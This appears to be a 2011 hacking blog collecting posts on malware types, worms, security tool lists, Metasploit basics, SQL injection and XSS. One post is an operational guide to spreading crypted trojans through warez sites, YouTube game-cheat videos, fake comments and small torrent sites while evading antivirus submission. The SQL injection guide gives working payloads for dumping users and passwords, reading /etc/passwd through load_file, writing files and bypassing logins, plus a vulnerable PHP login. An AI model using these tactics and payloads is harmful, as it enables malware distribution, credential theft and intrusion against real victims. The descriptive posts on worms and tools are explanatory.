Jaguar Geek's Blog

Differnt Types Of Malware

2011-09-10T23:40:00.002+05:30

Different Types Of Malware

Nowadays when people here the word virus they think keylogger or RAT(remote administration tool) but viruses/malware go alot more in depth then most people think

The main types i will be going over are

* Worms
* Trojan Horses(RAT)
* Logic Bombs
* Adware & Spyware

Worms
A worm is a program that can spread full copies or smaller versions of its self all over the harddrive and even over network sharing to other computer and even use your own email to send its self to everyone in your contacts. And it will either replace all your files with itsself or just keep spreading untill your harddrive has no more space left on it. One famous worm was the "IloveYou"
http://en.wikipedia.org/wiki/ILOVEYOU
How Do I Know If Im Infected?
With worms its pretty self evident, because you will notice either tons of junk files showing up or your hardrive space getting lower and lower, and the type of worm will depend on how fast it eats through your HD.

Trojan Horses
Trojan horses go by many names, RATS, remote admin tool, and the list is almost endless. The reason trojan horses are called remote administration tools are because thats just it, it allows them to access and control the infected computer from there own. RATS usually when ran create another copy of themself somewhere on the victims computer so that the slave can delete the original file and be nun the wiser. One way to check for trojans are check your "Start Up" (msconfig) or preform a portscan on your localhost.
How Do I Know If Im Infected?
Some signs signs that your infected with a trojan is that your anti virus/firewall could be disabled, or random events such as your wallpaper changing, random mouse movements, files being deleted without knowledge.

Logic Bombs
You dont really hear much about logic bombs anymore because there not that widely used.But just a little something about them.Logic bombs are highly destructive and can range from changing bytes of data on the HD to making the entire HD unreadable.Logic bombs are most commonly installed by insiders with access to the system.Like in 2008 an insider attempted to load a logic bomb with a timer onto a computer system at the Federal National Mortgage Association but was unsuccessful and was arrested.
How Do I Know If Im Infected?
At first you can have no knowledge because most logicbombs have timers to execute hours, days, weeks, months after file execution. But after it executes like a worm it will be self evident but unlike the worm filling space, you will notice a loss of data on the HD.

Adware & Spyware
Have you ever downloaded a program you thought was safe but all it did was give you popups? Thats typical adware. Adware is advertising software they arnt high security risks most of the time like the above. And most of the spyware is included with adware, spyware is more dangerous than adware because it "mines" data such as browsing history, emails, and sometimes creditcard #s and either uses it for marketing or sells it to other companies.
How Do I Know If Im Infected?
Adware is pretty obvious because you will get popups and stuff like that, but spyware is alot harder to notice sometimes.

Virus spreading II

2011-09-10T23:39:00.002+05:30

How to distribute viruses:

So I saw an article here on how to distribute viruses, Botnets and RATs. It seemed quite short and unfinished so I will try to finish it.

My history with viruses and Botnets is quite vast. I've been jumping between viruses for awhile, going around the net meeting many different virus writers and learning a lot about what makes a good writer and what makes a good distributor. A good writer rarely sends out his own work himself, instead he might hand it over to another person to send out to the world. I know that seems a bit weird but its true, people would work in teams to write, distribute, monitor and maintain.

So it's time to get started with this.

1. Warez

If you have read the first article you will know that a warez site is mainly for downloading cracked programs that would normally cost a fortune like AVG and Norton. However, these sites aren't as great as you might think. Most of these programs however contain a surprise that might cause upset to the downloader. Warez sites are the breeding ground for new viruses. Viruses can be bound to a program and when you set it up you could get an awful kick in the teeth. There are people who are willing to open up a program and setup a virus inside the program itself making it much harder to find. These people are usually part of a group of serious attackers. You could be in some serious s**t if you get hit by one of these.

2. Spam, spam everywhere

We all hate spam; it's a tangy kind of meat that doesn't hold a candle to ham. :D But really, who likes spam? Well, viruses love them. We all get spam every day, and most of it is just pure rubbish. They want us to go to some site and enter details, or to reply to the prince of Nigeria saying thanks but no thanks. We all know that viruses are in emails - almost all emails, whether they have an attachment or not. So the emails say beware of an upcoming virus that is going to spread all over the internet, is going to destroy the world, and will rape all the kids in your neighborhood, and that YOU are going to get the blame! Yep, spam is great for viruses, scareware, freeware, shareware; it's all the same! Spam is there to get you to read a dodgy PDF file that just exploits your OS, or to get you to visit a dodgy site that claims to know how Michael Jackson really died (you should really click that email, it's true).

3. IM and IRC

Instant messaging and IRC are great ways to meet people and talk to friends. But it only takes one idiot to get infected and to screw up everyone else.

The MSN bug...
The MSN bug is very annoying. Anyone who has more than ten contacts on it has faced it. Your friend says something along the lines of, "Hey LOL whats up? I just found this great new site www.istickthingsinmyarse.com YOU SHOULD SO CHECK IT OUT LOL!!!!!!!!!!!" Then you see that your friend is offline, send them a text asking if they are online and they say no. Well now you know that your friend got suckered into clicking something stupid. We aren't really sure what the point of the virus was. It was thought that it was a botnet, but this is too big and too quite to be a botnet.

IRC Worms...
IRC worms aren't as big or as common, but they do crop up and are worth a mention. IRC worms in the underbelly of the IRC are very dangerous when you can get smacked with one. You might go into an IRC you don't know, and the admin might say that he has to update the Client you are using to match the server. Now you and I both know that you would have to be an IRC n00b to believe this. But people are that stupid. Once these people get infected then they are at the mercy of the worm. Yep, it's kind of hard to believe that people are willing to accept something through IRC that they don't know what exactly it is.

4. People

People are willing to do many things to get you to download their virus or to get on their botnets. They will lie to you, entice you, seduce you - anything. These people will either be just harmless pranksters or serious groups of attackers that want to really get a lot out of you by any means. These are the people that are the front-end of the virus industry, and they are the ones that are pushing the virus. Like drug dealers on the street, they get caught, then get in trouble, small time stuff. They are the fall guys for the bigger gangs; they usually get a one time payment and are cut off once they get caught.

5. Hardware

Have you ever found a lost USB key? Ever think of looking at what's inside? You might find something unpleasant inside. There are people who will "lose" their USB key and want to it be found. Once you put it in, you might just get smacked in the face with a virus. Yeah, it's one of the new ways that is taking the world. Open up a MyUsb.pdf file and then this could get very messy. It could scan your documents, pictures, downloads, anything - and then send it on to an FTP server in some country such as Russia, and then simply delete itself. These viruses have to be fast, effective, and leave no trace. These high tech viruses are the latest in gathering information. But they are just much more than random attacks. They are being targeted at businesses and large companies - trojans that slam a system or that leave a backdoor for the attacker to get in for further use.

6. Torrents

Lastly, we have torrents. Torrents are open to the public to FREELY DOWNLOAD ITEMS THAT USERS HAVE UPLOADED! That had to be said since this is a very dangerous area. DON'T DOWNLOAD THINGS THAT AREN'T BY TRUSTED USERS!!!!!!! This section I will leave short since I have mentioned already most of which is said in the Warez section.

7. Random downloads

IF YOU DO THIS, YOU DESERVE WHAT YOU GET! THIS IS VERY STUPID AND SHOULD NOT BE DONE BY ANYONE THAT DOESN'T WANT TO RISK THEIR COMPUTER! IF YOU DO NOT KNOW WHAT YOU ARE DOWNLOADING THEN DONT DOWNLOAD IT!

This is a simple article with some ways that viruses are sent around. I hope you liked it. I will be doing more articles if you like this one.

Virus Spreading Tactics

2011-09-10T23:38:00.000+05:30

Virus Spread Tutorial

Hey all. This is my new tutorial about some of ways to spread your virus and get more logs from stealer, Botnet(s), RAT connections and much more.

Tutorial is by me so if you post on some other websites,blogs,forums etc. please put credit on me, Om3n.

(1.) First of all the bust way what i suggest to others are warez sites.

Whats Warez-Website?

Warez is site where you can find free cracked expensive software like AVG Internet Security, Kaspersky Internet Security 2008, Keyscrambler but the best way to spread on that kind of website is to post something which includes a crack that the user needs to run to crack the software but ofc must work + crypted + binded Trojan. Also you can do that on some stupid people to pind some videos, pictures or something that is not .exe! Also the really important thing is to post colored text,interesting images,virus scan (make sure it's novirusthanks.org or some other what doesn't sent scan results to Antivirus companies) and find some people to post fake comments like i do. Also when you spread make sure you got few accounts not one, maybe 3-4.

(2.) Second and really important thing is YouTube

What's YouTube?

Uhh everyone knows what YouTube is. It's a famous website where people share their videos, ideas, and software, etc. There comes our part: Thumb-sup. So what you have to do is to make new account. Don't put anything in your username that would keep people from downloading it such as "hacker". Make something stupid simple so that people think you are a kid. That's the really important thing. Also like I said before, get fake comments. That's really important too for spreading. Also, you will need few accounts as I said before. I suggest one for some fake programs (like some programs you make in C#,C++,VB.NET,VB6, for explanation: WoW Gold Hack, Runescape Hack etc). A lot of people want to be hackers so they will sure download these kinds of programs. I get around 20 victims per day per account (so that's around 40-50 a day) because of this. Also use GAME CHEATS. People love cheating so they will surely download it. I make videos for games like CS 1.6, CS:S, COD4, WoW etc. Make sure they works and they are crypted. This is really important or you will lose your connections because when AV detect Trojan they automatic block it and make your virus unusable (what you don't want to happen of course). Next way is like on Warez website is to use Cracks, good software, antiviruses etc.

(3.) The next important part of spreading your virus are Torrent websites.

What's a Torrent?

On torrent sites, you can find anything, movies, pictures, wallpapers, games, programs, etc. So that's good for us. But i don't really use torrents for spreading viruses, although they are great. I don't have time to upload big games, movies and things like that so i just use YouTube and Warez. I suggest not to use big torrent sites like piratebay because they send every file on virus scan to antivirus companies which is really bad for you if you buy one FUD private crypter. You don't want that to happen so just use some small Torrent websites.

IMPORTANT: Never upload your crypted Trojans on rapidshare. The reason because sometimes if you don't have premium account it will limit downloads on 25 or maybe close your premium account ( what happened to one guy i know ) SO NO RAPIDSHARE.

Worms

2011-09-10T23:37:00.000+05:30

Worms

A computer worm is by definition a self-replicating code that infects computers. They can be malicious or for good use. They use a computer network to get from computer to computer. They can be made to send themselves through emails and other means that the user may not notice. Unlike viruses, worms do not need to attach to files to get onto computers.
Worms can attack computers to infect them using the latest exploits for that system. This is called a wormnet. This is where the original worm learns of a new exploit, wheter by means of AI and Exploit-db[1] or by the original creater writing a new exploit to the worm and sending it out. Each worm will then copy the source of the worm it copied from so it can infect more computers. This method of high level attack can keep a single worm going for many months.
The difference between worms and viruses is that viruses are there to cause harm on purpose. They can modify or currupt the system. Worms however can cause harm to the network wheter as to just consume bandwidth or hook computers onto botnets.
Payloads are extra bits of code that make the worm do more than just copy itself, they can cause harm to the victim like the ExploreZip. This worm was sent by email to victims, when opened it would copy itself and modify WIN.INI so it is started on started on reboot. It would then look for Outlook and send itself to everyone in the mail contacts. Other payloads were ones that would encrypt a users files then display a pop-up asking the user to pay money to unlock their content or it would be deleted. This is called ransomware which a few worms have done.
Some payload free worms like the Morris worm and MyDoom didn't cause any actual damage but can cause network trouble.
Other payloads are ones like backdoors, keyloggers and RAT, Remote Admin Tool. Backdoors are when a system can be accessed again with need of hacking as the system has already been attacked. Backdoors are usually shells that stay open for the attacker to use. Keyloggers are scripts that can capture what keys are pressed. It can send reports live to the attacker as the user types or they can be sent to an FTP server when the victim is offline or the attack is offline. The FTP server needs a username and password. The issue with this is that if this code isn't obfusticated then if the worm is found and the source opened then the attack may get caught.
A RAT is a program that runs connects the victim to the attacker. Some advance RATs can allow the attacker to use the camera, microphone and the on screen keyboard. Most let you use a keylogger and several other tools. The best known RAT is DarkComet which can be tied to a worm to make it very very dangerous.
Not all worms are bad though. There are worms that infect computers to patch them. I would make a windows updater joke here but that's too obvious. These worms use user made patches for computers. Some like the Nachi family of worms, for example, tried to download and install patches from Microsoft's website to fix vulnerabilities in the host system–by exploiting those same vulnerabilities. These worms continued to infect and clean and so on until it hit a dead end and deleted itself. However these worms would work without the users concent and it rebooted the computer when the update was complete.
Worms can now spread though many other means like through social sites such as facebook by means of clickjacking and LikeJacking sessions. These encourage the victim to do something against their knowing, editing account info or visiting a site via iframe which can infect them.
Protecting from worms can be easy unless the bad guys have the upper hand. Zero day exploits are exploits that there is no patch for at the moment. These can be very dangerous and could take some time to get to the surface for the company to start fixing. Updating your system, keeping an eye on what needs urgent updates such as your java which you should update. Flash aswell as java needs to be monitered to be kept up to date as to protect your system from attack.
My personal favourite worm is the Blaster Worm which was written back in 2003 by a team of chinese hackers used to infect american computers. This worms infects the victim then says it will shut down the computer in 60 seconds. If the user can not react quick enough to kill this process then the computer will shutdown and reboot over and over. This worm would do one of a few things to infect other computers before shutting down. It would look for Outlook and use that and send itself to others. It would try to hijack an email session cookie for Hotmail or Yahoo. It would try to infect via port scanning the computer was in contact with and try to attack them wheter by wifi or wired connection.
Well known worms like the conficker worm in my opinion got way to much press for what it did. There are severeal versions of the worm and what was not told to the public was that users who were not infected with Conficker.A-D were not going to get infected with Conficker.E. This lack of information caused global panic and let companies like Symantic run rampid claiming that it was from Russia, it was from the UK, it accused people for writing it, they never found the person, they just proved that they are full of crap and know nothing on anything security as they can't even do their jobs right.
The Conficker worm did very little, it blocked users from running some programs that would give it away. It killed processes including an error in the code from Conficker.B that let the worm kill itself and try to restart itself while it kills itself causing infected computers to overclock after an hour or so of this. This error was fixed in Conficker.C It also stopped the victim from looking up certain words, phrases, sites or IP ranges. The worm did also opened up the limit as to how much data could be sent on the network. The Conficker family is classed as sevre which is quite strange as it does no real long term damage with a simple fix for it. This is very strange as no other worm is classed as sevre without doing real damage to the computer. This is proof that media can seriously make things worse when they go talking about stuff they don’t know about.
Media and worms go about as well together as gas and fire do. When they come together things just blow up and get out of hand. Lack of understanding they are there to report a new unholy worm that will eat your memory and email your porn to your grandmother. When it will do what the Conficker does, very little. With people who are reporting on these new worms before experts can even disect the matter. It’s all rush in get some small detail and blow it to all hell and scare half the internet offline. Also relying on companies like Symantic, AVG and Kaspersky have bad track records of keeping things quiet and bad monitering it as they are more focused on profit instead of just trying to catch and stop the worms and viruses.
This sort of behavior has allowed the bad guys to get the upperhand with new ways of encrypting their methods of attack and moving faster than any company can keep up.
This is a worm race between who can get which worm out fastest to the worm using whatever eploit they can. And an endless fight between which language is the dominant C++ or perl in worm creatation.
So all in all the worm is a fasinating piece of work, a masterpiece of coding which uses the most up to date attacks and is second to none in the world of infections.

Top 10 Windows Tools

2011-09-10T23:26:00.000+05:30

Top 10 Windows Tools
1. Cain & Abel - Cain & Abel is a password recovery tool for the Microsoft Windows Operating System. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols.

2. SuperScan - SuperScan is a powerful TCP port scanner, pinger, resolver. SuperScan 4 (Current Version) is a completely-rewritten update of the highly popular Windows port scanning tool, SuperScan.

3. GFI LANguard Network Security Scanner - GFI LANguard N.S.S. is a network vulnerability management solution that scans your network and performs over 15,000 vulnerability assessments. It identifies all possible security threats and provides you with tools to patch and secure your network. GFI LANguard N.S.S. was voted Favorite Commercial Security Tool by NMAP users for 2 years running and has been sold over 200,000 times!

4. PWDumpX v1.1 - This tool allows a user with administrative privileges to retrieve the domain password cache, the password hashes and the LSA secrets from a Windows system. This tool can be used on the local system or on one or more remote systems.

5. Dark Elevator - This tool is a Windows privilege escalation tool. It has two main modes, running as a standard user, it tries to find a way to Admin or System access on a box. In audit mode, it runs as admin and tries to find ways for a specific user to escalate their privileges.

6. GetAcct - An oldie, but still useful on Pen Tests. GetAcct sidesteps "RestrictAnonymous=1" and acquires account information on Windows NT/2000/XP/2003 machines.

7. Solarwinds - Solarwinds contains many network monitoring, discovery and attack tools. The advanced security tools not only test internet security with the SNMP Brute Force Attack and Dictionary Attack utilities but also validate the security on Cisco Routers with the Router Security Check. The Remote TCP Reset remotely display all active sessions on a device and the Password Decryption can decrypt Type 7 Cisco Passwords. The Port Scanner allows testing for open TCP ports across IP Address and port ranges or selection of specific machines and ports.

8. Burp Suite - Burp Suite is an integrated platform for attacking web applications. It contains all of the Burp tools with numerous interfaces between them designed to facilitate and speed up the process of attacking an application. All tools share the same robust framework for handling HTTP requests, authentication, downstream proxies, logging, alerting and extensibility.

9. CookieDigger - CookieDigger helps identify weak cookie generation and insecure implementations of session management by web applications. The tool works by collecting and analyzing cookies issued by a web application for multiple users. The tool reports on the predictability and entropy of the cookie and whether critical information, such as user name and password, are included in the cookie values.

10. Netcat (The Network SwissArmy Knife) - Netcat was originally a Unix utility which reads and writes data across network connections, using TCP or UDP protocol. It is designed to be a reliable "back-end" tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities.

Top 10 Linux Tools

2011-09-10T23:24:00.000+05:30

Top 10 Linux Tools
1. nmap - Nmap ("Network Mapper") is a free open source utility for network exploration or security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. Nmap runs on most types of computers and both console and graphical versions are available.

2. Nikto - Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 3200 potentially dangerous files/CGIs, versions on over 625 servers, and version specific problems on over 230 servers. Scan items and plugins are frequently updated and can be automatically updated (if desired).

3. THC-Amap - Amap is a next-generation tool for assistingnetwork penetration testing. It performs fast and reliable application protocol detection, independant on the TCP/UDP port they are being bound to.

4. Ethereal - Ethereal is used by network professionals around the world for troubleshooting, analysis, software and protocol development, and education. It has all of the standard features you would expect in a protocol analyzer, and several features not seen in any other product.

5. THC-Hydra - Number one of the biggest security holes are passwords, as every password security study shows. Hydra is a parallized login cracker which supports numerous protocols to attack. New modules are easy to add, beside that, it is flexible and very fast.

6. Metasploit Framework - The Metasploit Framework is an advanced open-source platform for developing, testing, and using exploit code. This project initially started off as a portable network game and has evolved into a powerful tool for penetration testing, exploit development, and vulnerability research.

7. John the Ripper - John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix flavors, supported out of the box are Kerberos AFS and Windows NT/2000/XP/2003 LM hashes, plus several more with contributed patches.

8. Nessus - Nessus is the world's most popular vulnerability scanner used in over 75,000 organisations world-wide. Many of the world's largest organisations are realising significant cost savings by using Nessus to audit business-critical enterprise devices and applications.

9. IRPAS - Internetwork Routing Protocol Attack Suite - Routing protocols are by definition protocols, which are used by routers to communicate with each other about ways to deliver routed protocols, such as IP. While many improvements have been done to the host security since the early days of the Internet, the core of this network still uses unauthenticated services for critical communication.

10. Rainbowcrack - RainbowCrack is a general propose implementation of Philippe Oechslin's faster time-memory trade-off technique. In short, the RainbowCrack tool is a hash cracker. A traditional brute force cracker try all possible plaintexts one by one in cracking time. It is time consuming to break complex password in this way. The idea of time-memory trade-off is to do all cracking time computation in advance and store the result in files so called "rainbow table".

Metasploit Tutorial (basics)

2011-09-10T23:22:00.002+05:30

This is a tutorial for a program called metasploit. You can download the program here: http://www.metasploit.com/.

After the download you must perform an online update. Then you can either run the the web version or the gui. Next you have to show the exploits and choose one then you will type: use (exploit)

Then you have to change a few options. So type show options and you then have to set the RHOST to what ever the computers ip. Then you have to set the RPORT to an open port. Then there will be targets to set like this.

set RHOST 189.829.13.19
set RPORT 27
set target (OS)

The OSs will be displayed.

Next you have to use the check command. All you do is type check. This will tell you if this works or not. (sometimes it cannot be displayed)

Next you type show payloads. Then you will choose a payload to use like this.

set payload (to what ever option you want to use)

Then you must show options again. You should get other options like LHOST and LPORT these go with your computer and you set these the same ways as the RHOST and RPORT. So this is what you will need to do.

set LHOST (your ip address)
set LPORT (an open port on your computer)

Then you will perform the exploit.

So to rap this up you will do these commands.

show exploits
set exploit
show options
set RHOST
set RPORT
show payloads
set payloads
show options
set LHOST
set LPORT
exploit

The Complete Guide to SQL Injections

2011-09-10T23:15:00.000+05:30

What is SQL Injection

SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another.

0x00 - Intro

All the information contained in the article is from personal experience, if I don't go over something that you currently do or have seen in SQL injections, its because I do not use it; not saying I'm right just that's how it is. As you should already know, extracting database information from a server without administration approval is illegal and I cannot be held accountable for any malicious actions executed after reading this acticle.

0x01 - What is MySQL

"SQL" stands for "Structed Query Language," which simply allows users to send queries to the server database. There are different types of SQL such as MSSQL, which is Microsoft's version of the language and also has some different commands as well as syntax.

0x02 - Finding SQL Injections

Before jumping into this topic I want to explain to you about comments in MySQL. There are three variations to a comment in this language:

--

/*

#

As you should already know a comment just blocks out a section so it will not be executed through the query. Typically, anytime you see a page from a website that takes in a paramater such as:

?id=

?category_id=

?user_id=

(not saying injections are narrowed down to only id parameters but they are quite common) you may want to test the page for a vulnerability. The simplest way I know of to check for a vulnerability is to add:

" and 1=1--

to the end of the url and see if the contents of the page change, even the slightest bit, if they don't then add

" and 1=0--

(it doesnt have to be 1=1 or 1=0 just something that returns true for the first statement and false for the second) and see if it changes after the second. If the contents change after the second query then you have a vulnerability.

0x03 - Gathering Information

To make your job or life a little easier you should look around the site some to gather information on what you are trying to retreive. For instance, if the site has a user registration look at the source code for the page and take note of the field names they use (most developers are lazy and use the same names for simplicity); you can also look around the site for more vulnerabilities. Alright so once you have found some good information to look forward to, its time to find out how many columns are being selected from the database from the original query. This is an important step because if number of columns you "select" and the number from the original are not identical, the injection does not work! To find out the number of column you simply add "order by x" on the end of your vulnerable url replacing "x" with a increasing number until you get an error

http://www.site.com/vulnerable.php?id=4 order by 9--

the number of columns being selected is the value of x before the error.

0x04 - The Injection

I suppose this is where some people get confused. In MySQL in order to combine two query statements you can use the keyword "union", you can also include the keyword "all" which will dislay all results (default property of union is to remove duplicate results from display). After your "union all" you also need to inlcude the keyword "select" since we are going to want to select database information and display it on the screen so far you should be looking at something similar to:

http://www.site.com/vulnerable.php?id=4 union all select

Continueing the injection like the previous example will work fine, but it will also display all the original results as well as our new results, typically to bypass this I, as well as most of the other people exploiting sql injections, relace the id value, in the case of our example it would be 4, with one of the following:

-1

null

or any result that would not be in the database, this way the original select query will not result anything but our new injected select query will display. In SQL each column being selected must be seperated by a comma(,) so if your vulnerable site is selecting 4 columns with the original statement (which was found earlier when we were gathering information using the "order by") you would just concatinate those on your injection; I like to set each column to a different numeric value that way i can keep track of which columns are actually being displayed on the screen. So far, if everything has been going ok, you should have an injection url looking something like:

http://www.site.com/vulnerable.php?id=-1 union all select 1,2,3,4--

If not then go back and keep reading it until you figure it out. The last part of our injection setup is the telling the query which table to "select" the information from; we do this with the keyword "from table"...pretty self explanitory right? So for example, we have a vulnerable site that has 4 columns being selected and we want to look at the "users" table we can have a set up such as:

http://www.site.com/vulnerable.php?id=-1 union all select 1,2,3,4 from users--

Easy enough so far, now is where it gets a little more difficult, but not too much.

0x05 - Tables and Columns

Depending on the version of MySQL the administrators are running on the server, finding table and column names can be very easy or somewhat irritating. There is an easy way to figure out what version is running on the server, can you guess? If you did not guess version(), why the hell not, its like one of the easiest and self explanitory things ever! Anyways, replace one of the columns in your injection that displays on the screen with the function call version() and this will tell you which typically its either 4.x.x or 5.x.x. If they are running some form of version 4 then you're basically on your own when it comes to figuring out table and column names (i'll post some examples of common names later); though if version 5 is implemented then your life is easy. As of version 5.1 of MySQL the developers began to automatically include a master database on the server called INFORMATION_SCHEMA. Within information_schema there are tables that give information about all the tables, columns, users, etc on the entire sql server (to find more about the structure of information_schema and the table/column names visit http://dev.mysql.com/doc/refman/5.0/en/information-schema.html). Once you figure out a table name and some column names within that table you want to look at just place them into our injection setup from before; suppose we have a site that has a "users" table and columns "user" and "pass" and the second and third columns are displayed onto the screen, we could view these by an injection such as:

http://www.site.com/vulnerable.php?id=-1 union all select 1,user, pass, 4 from users--

This example will display both the user and pass onto the screen in the given positions, though what happens if only one column is selected or displayed? In MySQL there is function called concat() which simply concatinates fields together so to simplify our privious example we could have:

http://www.site.com/vulnerable.php?id=-1 union all select 1, concat(user,0x3a, pass), 3, 4 from users--

"0x3A" is just a colon(:) in hexidecimal, simply to seperate the two fields for my own viewing.

0x06 - Narrowing down the Selection

Typically when performing a SQL injection there are multiple results you want to look at or possibly just one individual. There are a couple of ways to narrow down your selection first way is to use the "where" keyword is just takes a logical parameter such as "where id=1" which would look in the id column in the table and find which row is equal to 1. The next way to to use the "limit" keyword; this way is a little more useful since you do not need to know an additional column name to increment through the selections limit takes two parameters, where to start the selection and how many to select. So in order to select only the very first "user" from the table "users" using the "limit" keyword you could have:

http://www.site.com/vulnerable.php?id=-1 union all select user from users limit 0,1--

to look at the rest of the users individually you just increment the 0 up until you get an error. In order to look at all the results in a single swipe you can use the function group_concat() which works very similarly to concat() except it displays all the results for the given column(s) seperated by a comma(,) (the comma is just the default, you can change it by using the "separator" keyword and indicate a symbol to use).

0x07 - Obstacles

Excluding the fact that version 4 in general is an obstacle, there are a few different things web developers can do to try and make sql injections a little more difficult. The most common of these annoyances would be magic_quotes; basically magic quotes disallows any type of quotation marks and breaks it by adding a back-slash(\), which of course is going to mess up your injection. To get around this there is the nice little function char(); char() takes ascii values and generates the corresponding character value, thus eliminating the need for a quote. Example time...say we want to look at the "pass" column FROM the table "users" but only WHERE the "user" column is only equal to "admin" and the site only selects one column from the original query, easy enough right? we learned this earlier

http://www.site.com/vulnerable.php?id=-1 union all select pass from users where user="admin"--

curve ball! the developers have enabled magic_quotes therefore your "admin" will not work properly...i know its sad. To fix it we simply take the ascii values of each character (http://crashoverron.t35.com/ascii.php) so now we get

http://www.site.com/vulnerable.php?id=-1 union all select pass from users where user=char(97,100,109,105,110)--

TA-DA! injection fixed. Also another safety feature they try to block us with is regular expressions to search our input, but often times they have their expressions set to such narrow possibilities that you can bypass them by simply changing the case, the comment symbol, or replacing spaces with "+" (SQL is not case sensitive, it also sees "+" as a space filler much like a space).

0x08 - Additional opportunities

Although I said before version 4 was a pain in the ass, I have also noticed a nice feature common to version 4 vulnerable sites I have come across in my adventures; this feature would be the function load_file(), not saying the function is exclusive to version 4 but from my experience it is most commonly enabled for current users by developers for some reason in this version. load_file() acts just as file_get_contents() from PHP in that it returns the contents of the file into a string format. If enabled this allows for more than just SQL styles hacks on the server, it now allows for LFI vulnerabilities as well. Although, load_file() needs to have the exact full path to the file you are trying to open, for example: /home/CrashOverron/Desktop/file, and if input as a literal string then it must be encased in quotes, which brings back the issue of magic_quotes but as before just use the char() function. The next interesting feature that is hardly ever possible, but I have seen happen, is the use of the "INTO OUTFILE" keywords. This is the exact opposite of load_file(), in order to use either of these features the current user that MySQL is running as must have the FILE privilege on the server. Again, the full path is needed for the output file, which cannot be an existing file, though unlike load_file() the char() function does not fix magic_quotes. Time for an example of both, here is the situation: vulnerable site has 1 column selected also has a "users" table. load_file no magic_quotes:

http://www.site.com/vulnerable.php?id=-1 union all select load_file('/etc/passwd')--

load_file with magic_quotes:

http://www.site.com/vulnerable.php?id=-1 union all select load_file(char(47,101,116,99,47,112,97,115,115,119,100))--

INTO OUTFILE:

http://www.site.com/vulnerable.php?id=-1 union all select "test" INTO OUTFILE "/etc/test" from users--

0x09 - Blind SQL Injection

Blind SQL injection occurs when the original select query obtains column information but does not display it onto the screen. In order to continue through a blind sql injection you must basically brute-force any value you want to know. There are a few functions we can use in conjuction with each other that make this quite easy yet tedious, those would be the mid() and the ascii() functions. mid() is MySQL's substring function and ascii() does the exact opposite of char() it takes a character and exchanges it with the corresponding ascii numeric value. Doing this allows us to determine the range each of our desired value is in on the ascii chart, thus narrowing each down until we find a match. Example situation; we have found a site that is vulnerable to blind sql injection and we want to figure out which user MySQL is currently running as, our injection sequence could look something like:

http://www.site.com/vulnerable.php?id=1 and ascii(mid(user(),1,1)) < 97--

(this will tell us if the first letter in the user is above/below "a" then we can change the 97 to a different value until we find the character to the first letter)

http://www.site.com/vulnerable.php?id=1 and ascii(mid(user(),2,1)) < 97--

(just repeat as before and keep incrementing through the letters and you will eventually have the current user)

0x10 - Login Bypass

Ok, I left this for towards the end because it is not really very common anymore but I will through it in because I suppose you may run across it some day (I have only ran across this vulnerability once in real world). The concept behind the SQL login bypass is quite simple; in order to execute the exploit you input a username into the user field then in the password field of the form you put:

' or 1=1--

this just ends the current password field and includes the logical OR with a constant true statement. A simple MySQL login script could look like:

  <?php  $user = $_POST['user'];  $pass = $_POST['pass'];  $ref = $_SERVER['HTTP_REFERER'];   if((!$user) or (!$pass))  {   header("Location:$ref");   exit();  }  $conn = @mysql_connect("localhost", "root", "blah") or die("Could not connect"); $rs = @mysql_select_db("db", $conn) or die("db error");   $sql = "SELECT * FROM users WHERE user=\"$user\" AND pass=\"$pass\"";  $rs = mysql_query($sql, $conn) or die("query error");   $num = mysql_numrows($rs);  if($num != 0)  {   echo("Welcome $user");  }  else  {   header("Location:$ref");   exit();  } ?>

so if we input the user "admin" and "" or 1=1--" as the password the query sent to the server is going to look like this:

"SELECT * FROM users WHERE user="admin" AND pass="" or 1=1--"

so the server is going to select row where the "user" equals "admin" and disregard if the "pass" is correct because it is asking if the pass OR 1=1 are true, since 1=1 is always true you bypass the pass section.

0x11 - Useful Keywords/Functions

 UNION ALL SELECT AND/OR ORDER BY WHERE LIMIT LIKE INTO OUTFILE char() ascii() mid() concat() group_concat() load_file() user() database() version()

The Complete Guide to XSS

2011-09-10T23:13:00.000+05:30

What is Cross Site Scripting?

Cross-site scripting (XSS)is a type of computer security vulnerability typically found in web applications which allow code injection by malicious web users into the web pages viewed by other users. Cross-site scripting holes in general can be seen as vulnerabilities which allow attackers to bypass security mechanisms. By finding clever ways of injecting malicious scripts into web pages an attacker can gain elevated access privileges to sensitive page content, session cookies, and a variety of other objects.

There are three distinct types of XSS vulnerabilities:
non-persistent
persistent
and DOM-based (which can be either persistent or non-persistent).

Non-persistent cross-site scripting hole is also referred to as a reflected vulnerability, and is by far the most common type. These holes show up when data provided by a web client is used immediately by server-side scripts to generate a page of results for that user. A classic example of this is in site search engines: if one searches for a string which includes some HTML special characters, often the search string will be redisplayed on the result page to indicate what was searched for, or will at least include the search terms in the text box for easier editing. If any occurrence of the search terms is not HTML entity encoded, an XSS hole will result.

Persistent XSS vulnerability is also referred to as a stored or second-order vulnerability, and it allows the most powerful kinds of attacks. A type 2 XSS vulnerability exists when data provided to a web application by a user is first stored persistently on the server (in a database, file system, or other location), and later displayed to users in a web page without being encoded using HTML entities. A classic example of this is with online message boards, where users are allowed to post.

DOM-based XSS vulnerability, also referred to as local cross-site scripting, is based on the standard object model for representing HTML or XML called the Document Object Model or DOM for short. With DOM-based cross-site scripting vulnerabilities, the problem exists within a page's client-side script itself. For instance, if a piece of JavaScript accesses a URL request parameter and uses this information to write some HTML to its own page, and this information is not encoded using HTML entities, an XSS hole will likely be present, since this written data will be re-interpreted by browsers as HTML which could include additional client-side scripts.

Finding XSS Vulnerabilities

The most common used XSS injection test is:

<script>alert("XSS")</script>

